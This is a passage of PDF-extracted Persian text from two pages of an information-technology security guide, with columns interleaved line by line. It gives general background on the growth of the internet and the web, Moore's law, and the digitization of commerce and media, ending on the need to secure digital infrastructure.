ﻭ ﻣﻤﻠﻮ ﺍﺯ ﺍﺷﻜﺎﻝ ﺑﻮﺩﻧﺪ .ﺩﺭ ﻣﻘﺎﺑﻞ ،ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻧﺪﺍﺯﻩﺍﻱ
ﺑﺎﺷﻨﺪ.
ﻧﺴﺒﺘﹰﺎ ﻛﻮﭼﻚ ﺩﺍﺭﻧﺪ ،ﺍﺭﺯﺍﻥ ﻭ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻣـﻲﺗـﻮﺍﻥ
ﺍﻭﻝ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺸﻮﺭﻱ ﻳﺎﻓﺖ.
ﻣﺘﺼﻞ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻛﻤﺮﻧﮓ ﻛﺮﺩﻩ ﻭ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲﺳﺎﺯﻱ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋـﻪ
ﺑــﻪ ﻓﺎﺻــﻠﺔ ﻛﻮﺗــﺎﻫﻲ ﭘــﺲ ﺍﺯ ﺭﻭﺍﺝ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﺩﺭ ﺩﺍﻧــﺸﮕﺎﻫﻬﺎ،
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺗﺴﻬﻴﻞ ﻧﻤﻮﺩﻩ ﻭ ﻟـﺬﺍ ﻫـﺮ ﻛـﺴﻲ
ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺮﺍﻱ ﻣﺮﺗﺒﻂ ﺳﺎﺧﺘﻦ ﺁﻧﻬﺎ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ
ﻣﺴﺘﻘﻞ ﺍﺯ ﻣﺤﻞ ﻓﻴﺰﻳﻜﻲ ﺧﻮﺩ ﻗﺎﺩﺭ ﺑﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﺁﻥ
ﻧﺤﻮﻱ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﺒﺎﺩﻟﺔ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺟـﻮﺩ ﺁﻳـﺪ ﺁﻏـﺎﺯ
ﻣﻲﺑﺎﺷﺪ .ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ٨ﺑـﺮ ﺭﻭﻧـﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺗـﺄﺛﻴﺮﻱ
ﺷــﺪﻧﺪ .ﺍﺯ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﭘــﺮﻭﮊﻩﻫــﺎ ،ﭘــﺮﻭﮊﺓ ﺗﻮﺳــﻌﺔ ﺷــﺒﻜﺔ
ﻣﻀﺎﻋﻒ ﺩﺍﺷﺘﻪﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻧﺘﺎﻳﺞ ﺟﺴﺘﺠﻮ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﺿـﻮﻋﺎﺕ
ARPANETﻣﻮﻓﻘﻴﺖ ﺑﻴﺸﺘﺮﻱ ﻛﺴﺐ ﻛﺮﺩ ﻭ ﺑـﻪ ﺁﻥ ﭼﻴـﺰﻱ
ﻇﺎﻫﺮ ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﺑﺮ ﺍﺳﺎﺱ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺩﺍﺭﺩ؛
ﺗﺒﺪﻳﻞ ﺷﺪ ﻛﻪ ﺍﻣﺮﻭﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ "ﺍﻳﻨﺘﺮﻧﺖ" ﻣﻲﺷﻨﺎﺳﻴﻢ ﻭ ﺩﺭﺣﺎﻝ
ﺏ ﻛﺎﺭﺧﺎﻧﺠــﺎﺕ ﻭ ﺷــﺮﻛﺘﻬﺎﻱ ﻭﺍﻗــﻊ ﺩﺭ ﺑﻄﻮﺭﻳﻜــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ
ﺣﺎﺿﺮ ﺑﻴﺶ ﺍﺯ ۳۰۰ﻣﻴﻠﻴﻮﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑـﻪ ﻫـﻢ
ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻳﻜـﺴﺎﻧﻲ
ﻣﺮﺗﺒﻂ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺑﺮﺍﻱ ﻧﻈﺎﺭﻩﺷﺪﻥ ﺗﻮﺳﻂ ﻣﺮﺍﺟﻌﻴﻦ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ.
٥
ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ٣ﻛﻪ ﺗﻮﺳﻂ ﺗﻴﻢ ﺑﺮﻧﺮﺯ ﻟﻲ ٤ﻭ ﺭﺍﺑـﺮﺕ ﻛـﺎﻳﻠﻴﻮ
ﺩﻭﻣﻴﻦ ﻣﺴﺌﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﺄﺛﻴﺮﻱ ﺷﮕﺮﻑ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ
ﺩﺭ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺕ ﻫﺴﺘﻪﺍﻱ ﺍﺭﻭﭘﺎ ٦ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ۹۰ﻣﻴﻼﺩﻱ ﻭ
ﺣﺬﻑ ﻭﺍﺳﻄﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ
ﺩﺭ ﺷﻬﺮ ﮊﻧﻮ ﺍﻳﺠﺎﺩ ﺷﺪ ﺳﺮﻭﻳﺲ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ
ﺑــﻪ ﻛــﺎﻫﺶ ﭼــﺸﻤﮕﻴﺮ ﻧــﺮﺥ ﺍﺳــﺘﺨﺪﺍﻡ ﻣﻨــﺸﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺍﺷﺎﺭﻩﻛﺮﺩ ﻛﻪ ﺩﻟﻴﻞ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻮﺷﺘﻦ ﻣﺘﻦ ﻭ
1 Digital Tornado: The Internet and
ﭼﺎﭖ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺷﺨﺼﻲ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻃﺮﻳـﻖ ﺗـﺴﻬﻴﻼﺗﻲ Telecommunications Policy FCC Staff
Working Paper on Internet Policy (1997):
ﭼﻮﻥ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ ﻭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺁﺳـﺎﻧﺘﺮ ﺍﺯ ﺩﻳﻜﺘـﻪ http://www.fcc.gov/Bureaus/Miscellaneous/Ne
ﻛــﺮﺩﻥ ﻣــﺘﻦ ﺑــﺮﺍﻱ ﻳــﻚ ﻣﻨــﺸﻲ ﺍﺳــﺖ .ﺑــﻪ ﻫﻤــﻴﻦ ﺗﺮﺗﻴــﺐ ws_Releases/1997/nrmc7020.html
2 U.S. Bureau of Census
3 World-Wide Web
4 Tim Berners-Lee
5 Robert Cailliau
7 Services 6 Center for European Nuclear Research
8 Search Engine )(CERN
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٨
ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﺑﺮ ﺍﺳﺎﺱ ﮔﻔﺘﮕﻮﻫـﺎﻱ ﺭﻭ ﺩﺭ ﺭﻭ ﺍﻧﺠـﺎﻡ ﻣـﻲﮔﻴـﺮﺩ ﻱ ﺩﺳﺘﻪﺟﻤﻌﻲ ﻧﻴﺰ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺭﻭ ﺑﻪ ﺍﻧﻘﺮﺍﺽ ﺍﺳﺖ، ﮔﺮﺩﺷﮕﺮ ﹺ
ﻛﻤﺎﺑﻴﺶ ﺍﺯ ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ. ﭼﺮﺍﻛﻪ ﮔﺮﺩﺷـﮕﺮﺍﻥ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑﻠﻴﻄﻬـﺎﻱ ﻫـﻮﺍﻳﻲ ﻳـﺎ ﻗﻄـﺎﺭ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺍﺗﺎﻗﻬﺎﻱ ﻫﺘﻞ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑـﺮﺧﻂ ٩ﺭﺯﺭﻭ
ﺍﻳﻦ ﻣﻄﻠﺐ ﺩﺭ ﻣﻮﺭﺩ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻭﺍﺿﺢ ﺍﺳـﺖ:
ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺖ ﻣـﺸﺘﺮﻱ
ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ ﺩﺭ ﺯﻳـﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺷﺪﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﺑﺘﻮﺍﻥ ﺑﺎ ﻛﻤﻲ ﺩﻗﺖ ﺭﻭﻱ ﺳﻔﺎﺭﺷﺎﺕ ،ﺍﺯ ﻳـﻚ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺧﻮﺩ ﺩﺳﺖ ﻧﻴﺎﻓﺘﻪ ﻭ ﺍﺯ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﻳﺶ ﺑـﻪ
ﺳﻔﺮ ﻣﻔﺮﺡ ﻟـﺬﺕ ﺑـﺮﺩ .ﭘﻴـﺪﺍﻳﺶ ﺷـﺮﻛﺘﻬﺎﻱ ﻓﺮﻭﺷـﻨﺪﺓ ﻛﺘـﺎﺏ،
ﻧﺤﻮ ﻣﻄﻠﻮﺑﻲ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻲﻛﻨﻨﺪ ﺷﺎﻳﺴﺘﺔ ﺍﻋﺘﻤﺎﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺑـﻮﺩ
١٠ ﻣﻮﺳﻴﻘﻲ ﻭ ﻣﺤـﺼﻮﻻﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺑـﺮﺧﻂ ﻣﻮﺟـﺐ
ﻭ ﺍﺯ ﻛﺎﺭﻭﺍﻥ ﺍﻗﺘﺼﺎﺩ ﻧﻮﻳﻦ ﺟﻬﺎﻧﻲ ﻋﻘﺐ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ.
ﺗﻬﺪﻳــﺪ ﻭ ﺿــﺮﺑﻪ ﺑــﻪ ﻓﺮﻭﺷــﮕﺎﻫﻬﺎﻱ ﻋﺮﺿــﻪﻛﻨﻨــﺪﺓ ﺍﻳﻨﮕﻮﻧــﻪ
ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ ﻣﺤﺼﻮﻻﺕ ﺷﺪﻩ ،ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺍﻳﻦ
ﺻﻨﻒ ﺑﻪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﺪﻥ ﻃﻴﻒ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﻧﻴﺰ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ.
ﺍﻣﺮﻭﺯﻩ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺯ ﺣﻴﻄﺔ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻓﺮﺍﺗـﺮ ﺭﻓﺘـﻪ ﺍﺳـﺖ. ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺣﺮﻓـﻪﻫـﺎ ﻭ ﺻـﻨﺎﻳﻊ ﺳـﻨﺘﻲ ﺑـﻪ ﻭﺟـﻮﺩ ﺧـﻮﺩ ﺍﺩﺍﻣـﻪ
ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺻﻨﻌﺖ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﻣﻜﺎﻥ ﺳﺎﺧﺖ ﻣﻲﺩﻫﻨﺪ ،ﺗﻤﺎﻳﻞ ﺩﺍﺭﻧﺪ ﺍﻓﺮﺍﺩ ﻛﻤﺘـﺮﻱ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭﺁﻭﺭﻧـﺪ ﻭ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻘﻴﺎﺳﻬﺎﻱ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ ﺭﺍ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺠـﺎﻱ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻋﻤـﻮﻣﻲ ﺑـﻪ ﺳـﻤﺖ
ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻛﻨﻮﻥ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﺨﺼﺼﻲ ﺣﺮﻛﺖ ﻛﻨﻨﺪ .ﺗﺄﺛﻴﺮﺍﺕ ﻣﺸﻬﻮﺩ ﺭﻭﻧـﺪ ﺣـﺬﻑ
ﻭ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺭﺍ ﺩﺭ ﺟﻴﺐ ﺧﻮﺩ ﺟﺎﻱ ﺩﻫﻴﺪ .ﻋـﻼﻭﻩ ﻭﺍﺳﻄﻪﻫﺎ ﻛﻪ ﺑﺎ ﻇﻬﻮﺭ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺷـﺮﻭﻉ ﺷـﺪ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ
ﺑﺮ ﺍﻳﻦ ﺑﻬﺒﻮﺩ ﻧﺴﺒﺖ ﻗﻴﻤﺖ ﺑﻪ ﻛﺎﺭﺁﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻃﻮﻻﻧﻲ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﻳﺎﻓـﺖ ﻭ ﺑـﺎ ﺍﻫﻤﻴـﺖ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻨـﺎﻭﺭﻱ
ﻫﺮ ﺳﺎﻝ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ %۳۰ﺍﺳـﺖ ﻭ ﺍﺣﺘﻤـﺎﻝ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻳـﻦ ﺍﻃﻼﻋﺎﺕ ،ﺻﻨﺎﻳﻊ ﻭ ﺣﺮﻓﻪﻫﺎﻱ ﺑﻴﺸﺘﺮﻱ ﺑﺎ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﺧﻮﺍﻫﻨﺪ
ﻧﺴﺒﺖ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳـﺖ ١١.ﺍﻧﺘﻈـﺎﺭ ﻣـﺎ ﺍﻳـﻦ ﺷﺪ.
ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻘﺒﺎﻝ ﮔـﺴﺘﺮﺩﻩ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ
ﻋﺮﺻﻪﻫﺎﻱ ﻧﻮﻳﻨﻲ ﺩﺭ ﺗﺠﺎﺭﺕ ﭘﺪﻳﺪ ﺁﻭﺭﺩ ﻭ ﻧﻘﻄﺔ ﺷﺮﻭﻋﻲ ﺑـﺮﺍﻱ ﺳﻮﻣﻴﻦ ﭘﻴﺎﻣﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﺥ ﺑﻬـﺮﻩﻭﺭﻱ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺻـﻨﺎﻳﻊ
ﺁﻏﺎﺯ ﻋﺼﺮ ﻃﻼﻳﻲ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﺷﺪ. ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﺘﺎﺑﻲ ﭼﺸﻤﮕﻴﺮ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ
ﻳﺎﻓﺖ .ﺑﻪ ﻛﻤـﻚ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﻣﻜـﺎﻥ ﺍﺭﺳـﺎﻝ ﻭ ﺗﺒـﺎﺩﻝ
ﻼ ﺩﻳﺠﻴﺘــﺎﻟﻲ ﻫــﺴﺘﻨﺪ ﻭ
ﺗﺠﻬﻴــﺰﺍﺕ ﺗﻠﻔﻨــﻲ ﻣــﺪﺭﻥ ﺍﻣــﺮﻭﺯ ﻛــﺎﻣ ﹰ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻃﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﺛﺎﻧﻴـﻪ ﻣﻤﻜـﻦ ﺷـﺪﻩ،
ﺳﻴـــﺴﺘﻤﻬﺎﻱ ﻫﺪﻓﻤﻨـــﺪ ﺭﺍﻳﺎﻧـــﻪﺍﻱ ﺟـــﺎﻳﮕﺰﻳﻦ ﺗﺠﻬﻴـــﺰﺍﺕ ﺑﻄﻮﺭﻳﻜﻪ ﻣﺒﺎﺣﺚ ﻭ ﻣﺬﺍﻛﺮﺍﺕ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ
Switchingﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻟﺔ ﻣﻜﺎﻧﻴﻜﻲ ﺷﺪﻩﺍﻧﺪ .ﺍﺯ ﺯﻣﺎﻥ ﭘﻴﺪﺍﻳﺶ ﺍﺯ ﮔﺬﺷﺘﻪ ﭘﻴﮕﻴﺮﻱ ﻛﺮﺩ ﻭ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳﺎﻧﺪ .ﺍﻣﻮﺭ ﺑﺎﺯﺭﮔﺎﻧﻲ ﻛﻪ ﺗـﺎ
ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫـﺔ ۸۰ﻣـﻴﻼﺩﻱ ،ﺻـﺪﺍ ﻭ ﻣﻮﺳـﻴﻘﻲ ﭼﻨﺪﻱ ﻗﺒﻞ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ،ﺗﻠﻜﺲ ﻭ ﺗﻠﻔـﻦ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﺪﻧﺪ
ﺷﻜﻞ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻪ ﺧﻮﺩ ﮔﺮﻓﺘﻪ ﻭ ﺑـﺎ ﭘﻴـﺪﺍﻳﺶ ﻗﺎﻟـﺐ ﻣﻮﺳـﻴﻘﻲ ﺍﻛﻨﻮﻥ ﺑﺎ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻣﻔﺎﻫﻴﻤﻲ ﻧﻮﻳﻦ ﺩﺭ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺳـﻴﺎﺭ،
MP3ﺩﺭ ﺍﻭﺍﺧــﺮ ﺩﻫــﺔ ۹۰ﻣــﻴﻼﺩﻱ ﺿــﺒﻂ ﺻــﺪﺍ ﺣﺘــﻲ ﺩﺭ ﺳﺮﻳﻌﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﻪ ﺍﻧﺠﺎﻡ ﻣـﻲﺭﺳـﻨﺪ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﭼﺮﺧـﺔ
ﻼ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺩﻧﻴـﺎﻱ ﻣﺤﻴﻄﻬﺎﻱ ﺧﺎﻧﮕﻲ ﻧﻴﺰ ﻛﺎﻣ ﹰ ﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﻋﻜﺎﺳﻲ ﻭ ﻓﻴﻠﻤﺒـﺮﺩﺍﺭﻱ ﻧﻴـﺰ ﺗـﺼﺎﻭﻳﺮ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺩﻭﺭﺑﻴﻨﻬـﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺛﺒﺖ ﺗﺼﺎﻭﻳﺮ ﻓﻴﻠﻤﻬﺎﻱ ﻋﻜﺎﺳﻲ ﮔﺸﺘﻪﺍﻧﺪ. ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﻳﻤﻦ ﻧﮕﺎﻩ ﺩﺍﺷـﺘﻦ ﻣﺤـﻞ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﺟﺪﻳـﺪ ﺍﻟﺰﺍﻣـﻲ
10 Braga, Carlos Prima, Inclusión or Exclusion, ﺍﺳﺖ .ﺻﻨﻌﺖ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯ ﺑﻪ ﺷﺪﺕ ﺩﺭ ﺗﻜﺎﭘﻮﻱ ﻳﺎﻓﺘﻦ ﺭﺍﻫﻲ
UNESCO Courier:
http://www.fcc.gov/Bureaus/Miscellaneous/Ne
ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎﻱ ﺧــﻮﺩ ﻫــﺴﺘﻨﺪ ،ﭼﺮﺍﻛــﻪ
ws_Releases/1997/nrmc7020.html ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺁﻥ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ
ﺍﻳﻦ ﻧﺮﺥ ﭘﻴﺸﺮﻓﺖ ﻓﻨﻲ ﻳﻜﻲ ﺍﺯ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗـﺎﻧﻮﻥ Moorﺍﺳـﺖ ﻛـﻪ ۱۱
ﺑﻮﺳﻴﻠﺔ ،Gordon Moorﭘﺪﺭ ﺍﻳﻨﺘﻞ ﺩﺭ ﺩﻫﺔ ۱۹۶۰ﺗﺸﺮﻳﺢ ﺷﺪﻩ .ﺍﻭ ﻧﺎﺷﻲ ﺍﺯ ﻭﺟـﻮﺩ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻧـﺎﺍﻣﻦ ﺩﺭ ﺁﻥ
ﻣﻲﮔﻮﻳﺪ ﻃﻲ ﻫﺮ ﺩﻭﺭﺓ ۲ﺳـﺎﻟﻪ )ﻛـﻪ ﺑﻌـﺪﹰﺍ ﺁﻧـﺮﺍ ﺑـﻪ ۱۸ﻣـﺎﻩ ﻛـﺎﻫﺶ ﺩﺍﺩ( ﻣﻲﺑﺎﺷﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨـﺎﻥ ﻭ ﺍﻋﺘﻤـﺎﺩ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ،
ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎﻳﻲ ﺑـﺎ ﻇﺮﻓﻴـﺖ
ﺷﺒﻜﻪ ﻭ ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤﻴﻄـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ
ﺩﻭﺑﺮﺍﺑﺮ ﻭ ﻗﻴﻤﺖ ﻳﻜﺴﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺭﻭﻧﺪ ﻃﻲ ۴۰ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ
ﻫﻤﻴﻦ ﻣﻨﻮﺍﻝ ﺑﻮﺩﻩ ﻭ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺣﺪﺍﻗﻞ ﺗﺎ ۱۰ﺳـﺎﻝ ﺩﻳﮕـﺮ ﻧﻴـﺰ
ﻫﻤﻴﻨﻄﻮﺭ ﺑﺎﺷﺪ. 9 Online
٢٩ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﻋﻴﺐﻳﺎﺑﻲ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺧﻮﺩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ. ﺍﻣــﺮﻭﺯ ﺣﺘــﻲ ﻓﻴﻠﻤﻬــﺎﻱ ﺳــﻴﻨﻤﺎﻳﻲ ﻭ ﻛﺎﺭﺗﻮﻧﻬــﺎ ﻧﻴــﺰ ﺩﻳﺠﻴﺘــﺎﻟﻲ
